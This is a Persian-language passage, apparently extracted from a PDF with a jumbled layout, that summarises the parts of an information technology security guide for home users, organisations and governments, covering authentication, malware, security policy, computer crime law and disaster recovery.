‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻛﻤـﻚ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ ﺗـﺎ ﺑـﺮﺍﻱ ﺗﻘﻮﻳـﺖ ﺍﻳﻤﻨـﻲ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧـﻮﺩ ﺩﺭ ﻣﻨـﺰﻝ ﻭ ﻳـﺎ ﻣﺤـﻞ ﻛـﺎﺭ ﺩﺭ ﻣﻘﺎﺑـﻞ ﻧﻘـﺾ‬
‫ﺣﺮﻳﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﺆﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺑﺨﺶ ﺩﻭﻡ ﻛﺘﺎﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪﺍﻱ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣﺘﻌﺪﺩ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛـﺎﺭ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻜﻲ ﻛﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺗﻌﻴـﻴﻦ‬
‫ﺩﻗﻴــﻖ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺭﺍﻫﺒــﺮﻱ ﺁﻥ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻧﻲ ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻔﻴﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺑﺨﺶ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﺩﺍﺧﺘﻪ ﻭ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﻮﻧﻲ ﻛﻪ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣـﻲﺷـﻮﻧﺪ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻣـﺬﻛﻮﺭ ﺩﺭ‬
‫ﺑﺨﺶ ﺩﻭﻡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫‪7‬‬
‫‪8‬‬
‫‪9‬‬
‫‪10‬‬
‫‪11‬‬
‫ﺿﺮﻭﺭﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ؛ ﺗﺄﺛﻴﺮ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬
‫‪٢١‬‬
‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬
‫•‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ١٢‬ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ‪ ١٣‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪١٤‬؛‬
‫•‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺗﺤﻠﻴـﻞ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﻧﻮﻋﻲ؛‬
‫•‬
‫ﺍﻧﻮﺍﻉ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭ ﭼﮕﻮﻧﮕﻲ ﮔﺴﺘﺮﺵ ﺁﻧﻬﺎ؛‬
‫•‬
‫•‬
‫ﻣﺒﻨﺎﻱ ﻛﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻟﻴـﻞ ﺍﻳﻨﻜـﻪ‬
‫ﺍﺑﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ؛‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﻳﻪ ﻫﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻭ‬
‫ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬
‫•‬
‫•‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‬
‫ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪١٥‬؛‬
‫ﻧﻘﺶ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‪ ،‬ﺷـﺒﻜﻪﻫـﺎ ﻭ‬
‫ﺩﺍﺩﻩﻫﺎ؛‬
‫•‬
‫•‬
‫ﻣﻔﺎﻫﻴﻢ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﭼﻮﻥ ﺳﺎﺧﺘﺎﺭ ﺷﺒﻜﻪﻫـﺎﻱ ‪TCP/IP‬‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ‪ ،‬ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ‬
‫ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺘﻲ ﺧﺎﺭﺟﻲ؛‬
‫ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪﻣﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ‬
‫ﻟﺤﺎﻅ ﻓﻨﻲ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺑﺨﺶ ﺳﻮﻡ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺳـﺎﺯﻣﺎﻧﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ‬
‫ﺍﻣﻨﻴﺖ ﻣﻲﻧﮕﺮﺩ‪.‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺑﻌﺎﺩ ﺳﻴﺎﺳﺖ ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﻧﮕﺎﻩ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﻭ‬
‫ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺧﻄﺮ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻧﺎﮔﻬـﺎﻧﻲ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ ،‬ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻠﺘﺮ‬
‫ﻣﻲﻛﻨـﺪ ﻭ ﺍﺑـﺰﺍﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺣﻤـﻼﺕ ﻭ ﺍﺻـﻼﺡ‬
‫ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ‪ .‬ﺑـﺮﺍﻱ ﺣﻔـﻆ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﻣﺤﺮﻣﺎﻧــﻪ ﻭ ﻛﻤــﻚ ﺑــﻪ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ‬
‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ‪ ،‬ﺑﺎﻳﺪ ﺗﻠﻔﻴﻘـﻲ ﺍﺯ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺍﺟـﺰﺍﻱ‬
‫ﻣﺨﺘﻠﻒ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﺆﺛﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻣﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‪ ،‬ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻗﻴﻖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ‬
‫ﻣﻲﺩﻫﺪ‪:‬‬
‫• ﺭﻭﺵ ﻫﺸﺖ ﺭﻛﻨﻲ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺭﺯﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ؛‬
‫‪Authentication‬‬
‫‪Usernames‬‬
‫‪Passwords‬‬
‫‪Remote Access Tools‬‬
‫‪12‬‬
‫‪13‬‬
‫‪14‬‬
‫‪15‬‬
‫‪١٦‬‬
‫•‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﮔﺰﺍﺭﺵ ﻭﻗﺎﻳﻊ ﻭ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ؛‬
‫•‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ؛ ﻭ‬
‫•‬
‫ﺭﺍﻫﻨﻤﺎﻳﻴﻬــﺎﻱ ﺿــﻤﻴﻤﻪ ﻭ ﻋــﻮﺍﻣﻠﻲ ﻛــﻪ ﺑــﻪ ﻃﺮﺍﺣــﻲ ﻭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺨﺶ ﺳﻮﻡ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺑـﺎ‬
‫ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ‪ ،‬ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ ﻣﺮﻭﺭﻱ ﻛﻠﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻣﺒﺎﺣﺚ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ‬
‫ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﺒﺎﺣﺚ ﻋﻤﻴﻖﺗﺮﻱ ﺭﺍﺟﻊ ﺑـﻪ‬
‫ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ ﻭ ﺍﻳﻦ‬
‫ﻣﺴﺎﺋﻞ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﺟﻬﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻋﻨﺎﻭﻳﻦ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛـﻪ‬
‫ﻓﻬﻢ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﻮﺡ ﺩﻭﻟﺘﻲ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﻳﻚ ﺩﻭﻟـﺖ ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ‪ ،‬ﺑﺎﻳـﺪ ﻣﺘﻌﻬـﺪ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎﻳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺧﺘﻦ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻲ ﻣﻠﻲ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻧﻘﺶ ﻣﻬﻤـﻲ ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺩ‪ ،‬ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻨﺎﻗﻀﻲ ﻧﻴﺰ ﻭﺟﻮﺩ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺖ ﻣﻠﻲ ﺑﺎﻳﺪ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻗﻮﺍﻧﻴﻦ ﺿﻌﻴﻒ ﺩﻭﻟﺘـﻲ ﺑـﻴﺶ ﺍﺯ‬
‫ﺁﻧﻜﻪ ﺳﻮﺩﻱ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺿـﺮﺭ ﺑـﻪ ﺑـﺎﺭ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳـﺪ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﻴﻦ ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﺍﺯ‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺑﺮﺍﻱ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺘﻦ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫‪Disaster Recovery‬‬
‫‪16‬‬
‫‪٢٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﮔﺴﺘﺮﺵ ﺷﻴﻮﻩ ﻫﺎﻱ ﻧﻮﻳﻦ ﺧﻼﻓﻜﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ‬
‫ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺗــﻮﺍﺯﻧﻲ ﻣﻨﺎﺳــﺐ ﻣﻴــﺎﻥ ﻣﻌﻴﺎﺭﻫــﺎﻱ ﺗﻘﻨﻴﻨــﻲ ﻭ‬
‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺍﻫﻤﻴﺖ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﺩ‪ .‬ﻭﺍﺿﺢ ﺍﺳـﺖ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ﻭ ﻓﻨـﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺩﻭﻟﺘﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺩﺭ ﻣﺴﺎﺋﻞ ﻓﻨﻲ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺩﺍﺭﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺣﺎﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫• ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺩﻳﮕﺮ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑـﻪ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻩ ﺍﻣﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻭﻟـﺖ ﺍﺳـﺖ‬
‫)ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﻭﺍﺑﺴﺘﮕﻲ ﻣﺘﻘﺎﺑﻞ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ(؛‬
‫ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺧﺎﻧﮕﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﭘﻴـﺎﺩﻩ ﺳـﺎﺯﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﻛﻼﻥ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺑﺨـﺶ ﭘـﻨﺠﻢ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺑـﻪ ﺑﺮﺭﺳـﻲ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻭﻳﮋﺓ ﺍﻣﻨﻴﺘﻲ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺷﺎﻣﻞ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﺭﻭﺷـﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺗﺮﺍﻓﻴـﻚ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﻬﻢ‪ ،‬ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ١٧‬ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻭ ﺭﻭﺵ ﻣﻨﺎﺳﺐ ﻛﺎﺭ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺯﻣـﺎﻥ‬
‫ﺑﺤﺮﺍﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫• ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺳﻴﺴﺘﻢ؛‬
‫•‬
‫ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺨﺘﻠــﻒ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ ﺳــﻮﻱ‬
‫ﻋﻮﺍﻣﻞ ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻭ ﺩﺯﺩﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ؛‬
‫•‬
‫ﻧﻘﺶ ﻛﻠﻲ ﺩﻭﻟﺖ ﻭ ﻭﻇﺎﻳﻒ ﺁﻥ ﺩﺭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ‪ ،‬ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ؛‬
‫•‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ؛‬
‫•‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﻣﻘﺎﺑﻠــﻪ ﺑــﺎ ﺍﻓ ـﺸﺎﻱ‬
‫ﻏﻴﺮﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎ ﻋﻨﺎﻭﻳﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ‬
‫)ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ‬
‫‪١٩‬‬
